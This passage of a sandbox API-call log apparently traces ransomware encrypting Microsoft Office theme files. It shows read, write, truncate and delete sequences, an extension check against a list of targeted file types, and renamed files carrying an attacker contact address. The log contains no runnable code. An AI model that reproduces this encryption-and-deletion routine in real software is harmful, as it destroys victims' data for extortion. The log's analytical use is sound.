lpString2="eftx") returned -1 [0270.764] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.764] lstrlenW (lpString="Hardcover.eftx") returned 14 [0270.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.079] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=350689) returned 1 [0271.079] CloseHandle (hObject=0x384) returned 1 [0271.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx")) returned 0x20 [0271.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.131] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.131] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.131] GetLastError () returned 0x0 [0271.131] ReadFile (in: hFile=0x398, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x559e1, lpOverlapped=0x0) returned 1 [0271.188] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x559f0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x559f0, lpOverlapped=0x0) returned 1 [0271.194] ReadFile (in: hFile=0x398, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.194] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0271.194] SetEndOfFile (hFile=0x2ac) returned 1 [0271.194] CloseHandle (hObject=0x2ac) returned 1 [0271.194] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.194] SetEndOfFile (hFile=0x398) returned 1 [0271.206] CloseHandle (hObject=0x398) returned 1 [0271.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.213] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx")) returned 1 [0271.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.238] lstrlenW (lpString=".doc") returned 4 [0271.238] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.238] lstrlenW (lpString=".docx") returned 5 [0271.239] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.239] lstrlenW (lpString=".pdf") returned 4 [0271.239] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString=".xls") returned 4 [0271.239] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString=".xlsx") returned 5 [0271.239] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.239] lstrlenW (lpString=".ppt") returned 4 [0271.239] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.239] lstrlenW (lpString=".zip") returned 4 [0271.239] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString=".rar") returned 4 [0271.239] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString=".bz2") returned 4 [0271.239] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString=".7z") returned 3 [0271.239] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.239] lstrlenW (lpString=".dbf") returned 4 [0271.239] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.239] lstrlenW (lpString=".1cd") returned 4 [0271.239] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.239] lstrlenW (lpString=".jpg") returned 4 [0271.239] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.240] lstrlenW (lpString=".doc") returned 4 [0271.240] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString=".docx") returned 5 [0271.240] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.240] lstrlenW (lpString=".pdf") returned 4 [0271.240] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString=".xls") returned 4 [0271.240] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString=".xlsx") returned 5 [0271.240] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.240] lstrlenW (lpString=".ppt") returned 4 [0271.240] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.240] lstrlenW (lpString=".zip") returned 4 [0271.240] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString=".rar") returned 4 [0271.240] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString=".bz2") returned 4 [0271.240] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString=".7z") returned 3 [0271.240] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.240] lstrlenW (lpString=".dbf") returned 4 [0271.240] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.240] lstrlenW (lpString=".1cd") returned 4 [0271.240] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0271.240] lstrlenW (lpString=".jpg") returned 4 [0271.240] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.241] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.241] lstrlenW (lpString="Perspective.eftx") returned 16 [0271.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.249] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=21423) returned 1 [0271.249] CloseHandle (hObject=0x2ac) returned 1 [0271.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 0x20 [0271.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.249] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.249] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.249] GetLastError () returned 0x0 [0271.249] ReadFile (in: hFile=0x2ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x53af, lpOverlapped=0x0) returned 1 [0271.251] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x53b0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x53b0, lpOverlapped=0x0) returned 1 [0271.252] ReadFile (in: hFile=0x2ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.252] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0271.252] SetEndOfFile (hFile=0x328) returned 1 [0271.252] CloseHandle (hObject=0x328) returned 1 [0271.253] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.253] SetEndOfFile (hFile=0x2ac) returned 1 [0271.417] CloseHandle (hObject=0x2ac) returned 1 [0271.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 1 [0271.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.482] lstrlenW (lpString=".doc") returned 4 [0271.482] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.482] lstrlenW (lpString=".docx") returned 5 [0271.482] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.482] lstrlenW (lpString=".pdf") returned 4 [0271.482] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.482] lstrlenW (lpString=".xls") returned 4 [0271.482] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.482] lstrlenW (lpString=".xlsx") returned 5 [0271.482] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.482] lstrlenW (lpString=".ppt") returned 4 [0271.482] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.483] lstrlenW (lpString=".zip") returned 4 [0271.483] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString=".rar") returned 4 [0271.483] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString=".bz2") returned 4 [0271.483] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString=".7z") returned 3 [0271.483] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.483] lstrlenW (lpString=".dbf") returned 4 [0271.483] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.483] lstrlenW (lpString=".1cd") returned 4 [0271.483] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.483] lstrlenW (lpString=".jpg") returned 4 [0271.483] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.483] lstrlenW (lpString=".doc") returned 4 [0271.483] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString=".docx") returned 5 [0271.483] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.483] lstrlenW (lpString=".pdf") returned 4 [0271.483] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString=".xls") returned 4 [0271.483] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.483] lstrlenW (lpString=".xlsx") returned 5 [0271.483] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.484] lstrlenW (lpString=".ppt") returned 4 [0271.484] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.484] lstrlenW (lpString=".zip") returned 4 [0271.484] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.484] lstrlenW (lpString=".rar") returned 4 [0271.484] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.484] lstrlenW (lpString=".bz2") returned 4 [0271.484] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.484] lstrlenW (lpString=".7z") returned 3 [0271.484] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.484] lstrlenW (lpString=".dbf") returned 4 [0271.484] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.484] lstrlenW (lpString=".1cd") returned 4 [0271.484] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0271.484] lstrlenW (lpString=".jpg") returned 4 [0271.484] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.484] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.484] lstrlenW (lpString="Trek.eftx") returned 9 [0271.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.531] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=129924) returned 1 [0271.531] CloseHandle (hObject=0x380) returned 1 [0271.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx")) returned 0x20 [0271.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.580] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.580] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0271.581] GetLastError () returned 0x0 [0271.581] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x1fb84, lpOverlapped=0x0) returned 1 [0271.596] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1fb90, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1fb90, lpOverlapped=0x0) returned 1 [0271.599] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.599] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0271.599] SetEndOfFile (hFile=0x3b4) returned 1 [0271.599] CloseHandle (hObject=0x3b4) returned 1 [0271.599] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.599] SetEndOfFile (hFile=0x3ac) returned 1 [0271.602] CloseHandle (hObject=0x3ac) returned 1 [0271.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.602] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx")) returned 1 [0271.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.603] lstrlenW (lpString=".doc") returned 4 [0271.603] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString=".docx") returned 5 [0271.603] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.603] lstrlenW (lpString=".pdf") returned 4 [0271.603] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString=".xls") returned 4 [0271.603] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString=".xlsx") returned 5 [0271.603] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.603] lstrlenW (lpString=".ppt") returned 4 [0271.603] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.603] lstrlenW (lpString=".zip") returned 4 [0271.603] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString=".rar") returned 4 [0271.603] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString=".bz2") returned 4 [0271.603] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString=".7z") returned 3 [0271.603] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.603] lstrlenW (lpString=".dbf") returned 4 [0271.603] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.603] lstrlenW (lpString=".1cd") returned 4 [0271.604] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.604] lstrlenW (lpString=".jpg") returned 4 [0271.604] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.604] lstrlenW (lpString=".doc") returned 4 [0271.604] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString=".docx") returned 5 [0271.604] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.604] lstrlenW (lpString=".pdf") returned 4 [0271.604] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString=".xls") returned 4 [0271.604] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString=".xlsx") returned 5 [0271.604] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.604] lstrlenW (lpString=".ppt") returned 4 [0271.604] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.604] lstrlenW (lpString=".zip") returned 4 [0271.604] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString=".rar") returned 4 [0271.604] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString=".bz2") returned 4 [0271.604] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString=".7z") returned 3 [0271.604] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.604] lstrlenW (lpString=".dbf") returned 4 [0271.604] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.605] lstrlenW (lpString=".1cd") returned 4 [0271.605] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76 [0271.605] lstrlenW (lpString=".jpg") returned 4 [0271.605] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.605] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.605] lstrlenW (lpString="Urban.eftx") returned 10 [0271.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.614] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=19611) returned 1 [0271.614] CloseHandle (hObject=0x380) returned 1 [0271.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: 